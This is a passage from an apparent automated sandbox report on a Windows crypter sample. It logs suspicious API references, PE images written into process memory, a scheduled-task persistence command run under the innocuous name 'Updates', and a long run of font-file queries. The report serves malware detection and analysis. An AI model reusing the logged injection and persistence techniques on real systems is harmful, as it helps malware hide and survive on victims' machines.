              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/C1.cs | Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/e2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Memory written: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Process created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information (VolumeInformation) for:
                  C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                  Font files under C:\Windows\Fonts\:
                  arial.ttf, ariali.ttf, arialbd.ttf, arialbi.ttf, ARIALN.TTF, ariblk.ttf, ARIALNI.TTF, ARIALNB.TTF, ARIALNBI.TTF,
                  bahnschrift.ttf, calibri.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf,
                  cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf, Candara.ttf, Candarai.ttf, Candarab.ttf, Candaraz.ttf,
                  comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf, consola.ttf, consolai.ttf, consolab.ttf, consolaz.ttf,
                  constan.ttf, constani.ttf, constanb.ttf, constanz.ttf, corbel.ttf, corbeli.ttf, corbelb.ttf, corbelz.ttf,
                  cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf,
                  framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF, FRAMDCN.TTF, FRADMCN.TTF, FRAHV.TTF, FRAHVIT.TTF,
                  Gabriola.ttf, gadugi.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiab.ttf, georgiaz.ttf,
                  impact.ttf, Inkfree.ttf, javatext.ttf, LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf,
                  malgun.ttf, malgunsl.ttf, malgunbd.ttf, himalaya.ttf, msjh.ttc, msjhl.ttc, msjhbd.ttc,
                  ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf, micross.ttf, taile.ttf, taileb.ttf, msyh.ttc
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
